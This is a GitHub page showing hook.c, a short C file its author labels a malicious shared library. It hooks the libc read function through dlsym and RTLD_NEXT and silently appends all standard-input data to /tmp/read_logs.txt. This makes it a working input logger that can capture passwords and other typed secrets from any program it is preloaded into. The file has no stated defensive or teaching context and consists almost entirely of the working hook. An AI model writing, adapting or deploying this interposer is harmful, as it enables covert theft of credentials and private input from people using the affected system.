-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathhook.c
More file actions
30 lines (25 loc) · 693 Bytes
/
hook.c
File metadata and controls
30 lines (25 loc) · 693 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
/**
* Date : 15/03/2025 03:41 AM
* Author : @TF
* Description : Malicious Shared Library Hooking `read` Function.
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <dlfcn.h>
#include <unistd.h>
ssize_t read(int fd, void *buf, size_t count) {
static ssize_t (*orig_read)(int, void *, size_t) = NULL;
if (!orig_read) {
orig_read = dlsym(RTLD_NEXT, "read");
}
ssize_t output = orig_read(fd, buf, count);
if (fd == 0 && output > 0) {
FILE *logfile = fopen("/tmp/read_logs.txt", "a");
if (logfile) {
fwrite(buf, 1, output, logfile);
fputc('\n', logfile);
fclose(logfile);
}
}
return output;
}